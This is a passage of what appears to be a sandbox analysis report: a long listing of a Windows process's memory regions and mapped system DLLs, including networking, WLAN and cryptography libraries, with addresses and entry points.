Region: id = 2108 start_va = 0x77580000 end_va = 0x7761cfff entry_point = 0x775b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 2109 start_va = 0x77620000 end_va = 0x7777bfff entry_point = 0x7766ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 2110 start_va = 0x77780000 end_va = 0x77853fff entry_point = 0x777cbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 2111 start_va = 0x77860000 end_va = 0x778b6fff entry_point = 0x77879ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 2112 start_va = 0x77a00000 end_va = 0x77a8efff entry_point = 0x77a03fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 2113 start_va = 0x77a90000 end_va = 0x77b5bfff entry_point = 0x77a9168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 2114 start_va = 0x77b60000 end_va = 0x77c9bfff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 2115 start_va = 0x77cc0000 end_va = 0x77cc9fff entry_point = 0x77cc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 2116 start_va = 0x77ce0000 end_va = 0x77cf8fff entry_point = 0x77ce4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 2117 start_va = 0x77d00000 end_va = 0x77d82fff entry_point = 0x77d023d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 2118 start_va = 0x77da0000 end_va = 0x77da0fff entry_point = 0x77da0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 2119 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2120 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 2121 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 2122 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 2123 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 2124 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 2125 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 2126 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 2127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2128 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 2129 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2130 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 2131 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 2132 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 2133 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 2134 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2135 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2136 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2137 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2138 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 2139 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2140 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2141 start_va = 0x16f0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 2142 start_va = 0x74320000 end_va = 0x74340fff entry_point = 0x7432145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" Region: id = 2143 start_va = 0x76060000 end_va = 0x760a4fff entry_point = 0x760611e1 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" Region: id = 2148 start_va = 0x701a0000 end_va = 0x701b4fff entry_point = 0x701a1390 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" Region: id = 2262 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2263 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 2264 start_va = 0x1470000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 2265 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 2266 start_va = 0x6ed60000 end_va = 0x6eda6fff entry_point = 0x6ed6b21b region_type = mapped_file name = "netman.dll" filename = "\\Windows\\System32\\netman.dll" Region: id = 2267 start_va = 0x72c80000 end_va = 0x72c86fff entry_point = 0x72c8128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 2268 start_va = 0x77ca0000 end_va = 0x77ca5fff entry_point = 0x77ca1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 2269 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 2270 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 2274 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2275 start_va = 0x1610000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 2276 start_va = 0x6ed30000 end_va = 0x6ed47fff entry_point = 0x6ed3eb85 region_type = mapped_file name = "wpdbusenum.dll" filename = "\\Windows\\System32\\wpdbusenum.dll" Region: id = 2277 start_va = 0x72bd0000 end_va = 0x72be4fff entry_point = 0x72bd325e region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" Region: id = 2278 start_va = 0x1580000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 2279 start_va = 0x736e0000 end_va = 0x73768fff entry_point = 0x736e55c7 region_type = mapped_file name = "PortableDeviceApi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" Region: id = 2280 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 2281 start_va = 0x6ec80000 end_va = 0x6ec91fff entry_point = 0x6ec8aba7 region_type = mapped_file name = "PortableDeviceConnectApi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" Region: id = 2282 start_va = 0x6ec70000 end_va = 0x6ec79fff entry_point = 0x6ec73a91 region_type = mapped_file name = "Apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" Region: id = 2283 start_va = 0x71eb0000 end_va = 0x71f10fff entry_point = 0x71eb3921 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" Region: id = 2284 start_va = 0x729f0000 end_va = 0x72a3bfff entry_point = 0x729f2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" Region: id = 2285 start_va = 0x17f0000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 2286 start_va = 0x72c90000 end_va = 0x72cabfff entry_point = 0x72c9a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 2287 start_va = 0x737d0000 end_va = 0x73a34fff entry_point = 0x737dbaff region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" Region: id = 2288 start_va = 0x74130000 end_va = 0x7413ffff entry_point = 0x741338c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" Region: id = 2289 start_va = 0x19d0000 end_va = 0x19dffff entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 2290 start_va = 0x1b90000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 2291 start_va = 0x75d20000 end_va = 0x75d2bfff entry_point = 0x75d2238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 2292 start_va = 0x75d50000 end_va = 0x75e6cfff entry_point = 0x75d5158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 2293 start_va = 0x75e70000 end_va = 0x75e9cfff entry_point = 0x75e7296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" Region: id = 2320 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2321 start_va = 0x6ea70000 end_va = 0x6ea84fff entry_point = 0x6ea712de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" Region: id = 2322 start_va = 0x6ea90000 end_va = 0x6eae1fff entry_point = 0x6ea914be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" Region: id = 2323 start_va = 0x6eaf0000 end_va = 0x6eb18fff entry_point = 0x6eaf133a region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" Region: id = 2324 start_va = 0x6eb20000 end_va = 0x6ebe0fff entry_point = 0x6eb2169a region_type = mapped_file name = "rasdlg.dll" filename = "\\Windows\\System32\\rasdlg.dll" Region: id = 2325 start_va = 0x70080000 end_va = 0x7008cfff entry_point = 0x70081326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" Region: id = 2326 start_va = 0x75fd0000 end_va = 0x76004fff entry_point = 0x75fd145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 2327 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 2328 start_va = 0x1990000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 2329 start_va = 0x74080000 end_va = 0x74088fff entry_point = 0x74081229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" Region: id = 2343 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 2344 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2345 start_va = 0x15d0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 2346 start_va = 0x6fa80000 end_va = 0x6fae6fff entry_point = 0x6fa87b26 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" Region: id = 2347 start_va = 0x74070000 end_va = 0x74079fff entry_point = 0x74074d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" Region: id = 2348 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 2349 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 2350 start_va = 0xec0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 2351 start_va = 0x1d90000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 2352 start_va = 0x75500000 end_va = 0x7550dfff entry_point = 0x75501289 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" Region: id = 2353 start_va = 0x71e60000 end_va = 0x71e8efff entry_point = 0x71e61191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2354 start_va = 0x71e90000 end_va = 0x71ea9fff entry_point = 0x71ea0ae3 region_type = mapped_file name = "dot3api.dll" filename = "\\Windows\\System32\\dot3api.dll" Region: id = 2355 start_va = 0x740a0000 end_va = 0x740b3fff entry_point = 0x740a1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" Region: id = 2356 start_va = 0x6ea20000 end_va = 0x6ea4efff entry_point = 0x6ea21191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2357 start_va = 0x6ea50000 end_va = 0x6ea60fff entry_point = 0x6ea59a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2358 start_va = 0x71e20000 end_va = 0x71e53fff entry_point = 0x71e211b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2359 start_va = 0x71e60000 end_va = 0x71e65fff entry_point = 0x71e61a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 2360 start_va = 0x71e70000 end_va = 0x71e85fff entry_point = 0x71e71240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2361 start_va = 0x71e90000 end_va = 0x71ea6fff entry_point = 0x71e91340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2362 start_va = 0x6f720000 end_va = 0x6f769fff entry_point = 0x6f721851 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" Region: id = 2363 start_va = 0x6fc30000 end_va = 0x6fc39fff entry_point = 0x6fc3149a region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" Region: id = 2364 start_va = 0x70110000 end_va = 0x7016bfff entry_point = 0x70132b48 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" Region: id = 2365 start_va = 0x1930000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 2366 start_va = 0x6f930000 end_va = 0x6f93efff entry_point = 0x6f9321a0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" Region: id = 2367 start_va = 0x6fc40000 end_va = 0x6fc57fff entry_point = 0x6fc41335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" Region: id = 2368 start_va = 0x6fc60000 end_va = 0x6fcf5fff entry_point = 0x6fc7f8b9 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" Region: id = 2369 start_va = 0x6ea00000 end_va = 0x6ea2efff entry_point = 0x6ea01191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2370 start_va = 0x6ea30000 end_va = 0x6ea63fff entry_point = 0x6ea311b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2371 start_va = 0x71e30000 end_va = 0x71e40fff entry_point = 0x71e39a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2372 start_va = 0x71e50000 end_va = 0x71e55fff entry_point = 0x71e51a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 2373 start_va = 0x71e70000 end_va = 0x71e86fff entry_point = 0x71e71340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2374 start_va = 0x71e90000 end_va = 0x71ea5fff entry_point = 0x71e91240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2375 start_va = 0x1830000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 2376 start_va = 0x71e40000 end_va = 0x71e6efff entry_point = 0x71e41191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2377 start_va = 0x71e70000 end_va = 0x71e89fff entry_point = 0x71e80ae3 region_type = mapped_file name = "dot3api.dll" filename = "\\Windows\\System32\\dot3api.dll" Region: id = 2378 start_va = 0x1340000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 2379 start_va = 0x6ea20000 end_va = 0x6ea4efff entry_point = 0x6ea21191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2380 start_va = 0x6ea50000 end_va = 0x6ea60fff entry_point = 0x6ea59a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2381 start_va = 0x71e20000 end_va = 0x71e53fff entry_point = 0x71e211b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2382 start_va = 0x71e60000 end_va = 0x71e65fff entry_point = 0x71e61a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 2383 start_va = 0x71e70000 end_va = 0x71e85fff entry_point = 0x71e71240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2384 start_va = 0x71e90000 end_va = 0x71ea6fff entry_point = 0x71e91340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2389 start_va = 0x1b40000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 2390 start_va = 0x6e9c0000 end_va = 0x6e9eefff entry_point = 0x6e9c1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2391 start_va = 0x6e9f0000 end_va = 0x6ea00fff entry_point = 0x6e9f9a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2392 start_va = 0x6ea10000 end_va = 0x6ea43fff entry_point = 0x6ea111b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2393 start_va = 0x6ea50000 end_va = 0x6ea66fff entry_point = 0x6ea51340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2394 start_va = 0x71e90000 end_va = 0x71ea5fff entry_point = 0x71e91240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2395 start_va = 0x6e990000 end_va = 0x6e9befff entry_point = 0x6e991191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2396 start_va = 0x6e9f0000 end_va = 0x6ea23fff entry_point = 0x6e9f11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2397 start_va = 0x6ea30000 end_va = 0x6ea46fff entry_point = 0x6ea31340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2398 start_va = 0x6ea50000 end_va = 0x6ea60fff entry_point = 0x6ea59a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2399 start_va = 0x1b50000 end_va = 0x1b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 2400 start_va = 0x6e9c0000 end_va = 0x6e9eefff entry_point = 0x6e9c1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2401 start_va = 0x6e9f0000 end_va = 0x6ea00fff entry_point = 0x6e9f9a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2402 start_va = 0x6ea10000 end_va = 0x6ea43fff entry_point = 0x6ea111b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2403 start_va = 0x6ea50000 end_va = 0x6ea66fff entry_point = 0x6ea51340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2404 start_va = 0x16a0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 2405 start_va = 0x6e990000 end_va = 0x6e9befff entry_point = 0x6e991191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2406 start_va = 0x6e9f0000 end_va = 0x6ea23fff entry_point = 0x6e9f11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2407 start_va = 0x6ea30000 end_va = 0x6ea46fff entry_point = 0x6ea31340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2408 start_va = 0x6ea50000 end_va = 0x6ea60fff entry_point = 0x6ea59a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2412 start_va = 0xe80000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 2413 start_va = 0x6e960000 end_va = 0x6e98efff entry_point = 0x6e961191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2414 start_va = 0x6e9c0000 end_va = 0x6e9d0fff entry_point = 0x6e9c9a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2415 start_va = 0x6e9e0000 end_va = 0x6ea13fff entry_point = 0x6e9e11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2416 start_va = 0x6ea20000 end_va = 0x6ea36fff entry_point = 0x6ea21340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2417 start_va = 0x1350000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 2418 start_va = 0x6e990000 end_va = 0x6e9befff entry_point = 0x6e991191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2419 start_va = 0x6e9c0000 end_va = 0x6e9f3fff entry_point = 0x6e9c11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2420 start_va = 0x6ea00000 end_va = 0x6ea16fff entry_point = 0x6ea01340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2421 start_va = 0x6ea20000 end_va = 0x6ea30fff entry_point = 0x6ea29a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2422 start_va = 0x1d40000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2423 start_va = 0x6e960000 end_va = 0x6e98efff entry_point = 0x6e961191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2424 start_va = 0x6e9c0000 end_va = 0x6e9d0fff entry_point = 0x6e9c9a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2425 start_va = 0x6e9e0000 end_va = 0x6ea13fff entry_point = 0x6e9e11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2426 start_va = 0x6ea20000 end_va = 0x6ea36fff entry_point = 0x6ea21340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2433 start_va = 0x1b30000 end_va = 0x1b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 2434 start_va = 0x6e990000 end_va = 0x6e9befff entry_point = 0x6e991191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2435 start_va = 0x6e9c0000 end_va = 0x6e9f3fff entry_point = 0x6e9c11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2436 start_va = 0x6ea00000 end_va = 0x6ea16fff entry_point = 0x6ea01340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2437 start_va = 0x6ea20000 end_va = 0x6ea30fff entry_point = 0x6ea29a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2441 start_va = 0x17b0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 2442 start_va = 0x6e960000 end_va = 0x6e98efff entry_point = 0x6e961191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2443 start_va = 0x6e9c0000 end_va = 0x6e9d0fff entry_point = 0x6e9c9a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2444 start_va = 0x6e9e0000 end_va = 0x6ea13fff entry_point = 0x6e9e11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2445 start_va = 0x6ea20000 end_va = 0x6ea36fff entry_point = 0x6ea21340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2457 start_va = 0x1360000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 2458 start_va = 0x6e9e0000 end_va = 0x6ea0efff entry_point = 0x6e9e1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2459 start_va = 0x6ea10000 end_va = 0x6ea29fff entry_point = 0x6ea20ae3 region_type = mapped_file name = "dot3api.dll" filename = "\\Windows\\System32\\dot3api.dll" Region: id = 2460 start_va = 0x6e940000 end_va = 0x6e96efff entry_point = 0x6e941191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2461 start_va = 0x6e970000 end_va = 0x6e980fff entry_point = 0x6e979a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2462 start_va = 0x6e9d0000 end_va = 0x6ea03fff entry_point = 0x6e9d11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2463 start_va = 0x6ea10000 end_va = 0x6ea26fff entry_point = 0x6ea11340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2464 start_va = 0x71e80000 end_va = 0x71e85fff entry_point = 0x71e81a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 2465 start_va = 0x71e90000 end_va = 0x71ea5fff entry_point = 0x71e91240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2466 start_va = 0x1490000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 2467 start_va = 0x6e950000 end_va = 0x6e983fff entry_point = 0x6e9511b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2468 start_va = 0x6e9c0000 end_va = 0x6e9eefff entry_point = 0x6e9c1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2469 start_va = 0x6e9f0000 end_va = 0x6ea06fff entry_point = 0x6e9f1340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2470 start_va = 0x6ea10000 end_va = 0x6ea20fff entry_point = 0x6ea19a4c region_type = mapped_file name = 